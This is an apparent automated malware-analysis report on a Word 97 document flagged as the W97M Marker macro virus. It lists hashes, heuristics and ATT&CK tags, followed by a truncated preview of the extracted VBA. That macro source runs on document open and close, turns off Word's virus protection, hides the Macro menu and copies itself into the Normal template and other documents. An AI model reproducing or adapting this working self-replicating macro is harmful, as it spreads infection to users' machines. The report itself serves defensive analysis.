W97M — Office (OLE) malware analysis

Static analysis result for SHA-256 99e6b2880df1c573…

MALICIOUS

Office (OLE)

Size: 46.5 KB
Created: 2000-07-25 04:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e49133be35c117ff0b753ba670e92523
SHA-1: cea4dafbc279d6a95e0cb5910e5fcfdcc7be1720
SHA-256: 99e6b2880df1c573c18087b2e0ef8451f4aca17b7ea5954ad59b40a7c97023ad
Risk Score: 220

Malware Insights

W97M · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro that executes upon opening. The macro attempts to disable virus protection, modify application settings, and potentially spread itself by writing to the Normal template. The presence of 'W97M' in the document body and the macro's behavior strongly indicate a W97M family infection.

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-18 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-18
  • OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY
    OLE file is 47,616 bytes but its declared streams total only 27,699 bytes; 19,917 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename:  macros.bas
Kind:      vba-macro
Source:    oletools.olevba.extract_macros (decoded VBA source)
Size:      25848 bytes
SHA-256:   81329d2e4dea05b54ce3a1c1dedc75ad0518a2a7e95bcc065e8ea958ef2fdfc7
Detection: ClamAV: Doc.Trojan.Marker-18
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Son, Be a Good Boy !
Const Marker = "<- this is a marker! by fs2000"

Private Sub Document_Open()
    Document_Close
End Sub
Private Sub Document_Close()
    Dim nmod As Object
    Dim isd As String
    Dim DS, NTS, DI, NTI As Boolean
    Dim EmailMe, Users, LogData, LogFile As String
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    AddIns.Unload True
    Options.VirusProtection = False
    Application.UserName = "fs080298"
    Application.UserInitials = "FS2000"
    Application.UserAddress = "fs080298@yeayea.com"
    Application.EnableCancelKey = wdCancelDisabled
    GoSub Sisipin
    If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
    "LogData in") = False) Then GoSub LoggingIn
    GoSub EmailMePlease
    GoTo Finish
    
Sisipin:
    Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
    DI = AD.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NTI = NT.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
        If DI Then
            NTS = NormalTemplate.Saved
            EmailMe = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
        For i = 1 To Len(Application.UserAddress)
            If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
                If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then
                    Users = Users & Mid(Application.UserAddress, i, 1)
                End If
            Else
                Users = Users & Chr(13) & " '"
            End If
        Next
    EmailMe = EmailMe & Chr(13) & _
         "' " & Format(Time, "hh:mm:sc AMPM-") & _
                Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
         "' " & Application.UserName & Chr(13) & _
         "' " & Users & Chr(13) & Chr(13) & " "
    NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
    NT.CodeModule.AddFromString EmailMe
    If NTS Then NormalTemplate.Save
    End If
    If NTI Then
        DS = ActiveDocument.Saved
        EmailMe = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
        AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
        AD.CodeModule.AddFromString EmailMe
        If DS Then ActiveDocument.Save
        End If
    End If
    Return
    
LoggingIn:
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
    GoSub EmailMePlease
    Return

EmailMePlease:
    Dim SystemRoot As String
    On Error Resume Next
    SystemRoot = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\International", "s1159") = Chr$(60) + Chr$(40) + Chr$(164) + Chr$(191) + Chr$(164) + Chr$(41) + Chr$(62)
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\International", "sTimeFormat") = "HH:mm:ss tt"
    Open SystemRoot & "\EmailMe.html" For Output As #1
        Print #1, "<html><head><title>Email Me !</title></head><body bgcolor='#000000' link='#FFFF00' vlink='#00FFFF'>"
        Print #1, "<p align='right'><font color='#80FF00' size='3' face='Arial'><marquee scrollamount='3' width='53%'> © Have a Nice Day ! - Don't Forget to Save Your Data...</marquee></font></p>"
        Print #1, "<h6 align='center'><font color=brown size='7'><marquee behavior='alternate' width='100%'>¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤</marquee></font>"
        Print #1, "<p align='center'><font color='#FF80FF' size='7'><marquee behavior='alternate' width='11%'>ÒÓ</marquee></f
... (truncated)